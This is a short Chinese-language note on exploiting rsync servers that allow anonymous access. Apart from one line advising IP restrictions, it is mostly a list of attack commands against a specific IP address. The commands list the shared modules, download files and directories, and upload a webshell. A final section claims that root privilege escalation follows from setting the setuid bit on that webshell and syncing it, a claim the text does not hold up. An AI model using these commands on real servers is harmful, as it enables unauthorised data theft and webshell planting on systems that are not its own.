前言

Rsync（remote synchronize）是一款实现远程同步功能的软件，它在同步文件的同时，可以保持原来文件的权限、时间、软硬链接等附加信息。

rsync是用 “rsync 算法”提供了一个客户机和远程文件服务器的文件同步的快速方法，而且可以通过ssh方式来传输文件，提高其保密性。

利用

rsync默认允许匿名访问,若未添加用户口令则可以进行匿名登录。 建议对rsync的IP访问进行限制以防止在用户口令被猜解或泄露时造成损失。

rsync 222.53.16.4.:: #列出同步目录 rsync 222.53.16.4::www/ #列出同步目录中的www目录 rsync -avz 222.53.16.4::www/test.php /root #下载文件到本地 rsync -avz 222.53.16.4::www/ /var/tmp #下载目录到本地 rsync -avz webshell.php 222.53.16.4::www/ #上传本地文件到rsync服务器 

利用rsync提权

rsync进程默认以root权限启动,利用rsync同步文件的同时，可以保持原来文件的权限的特性，可以使用rsync进行提权。

chmod a+s webshell.php rsync -avz webshell.php 222.53.16.4::www/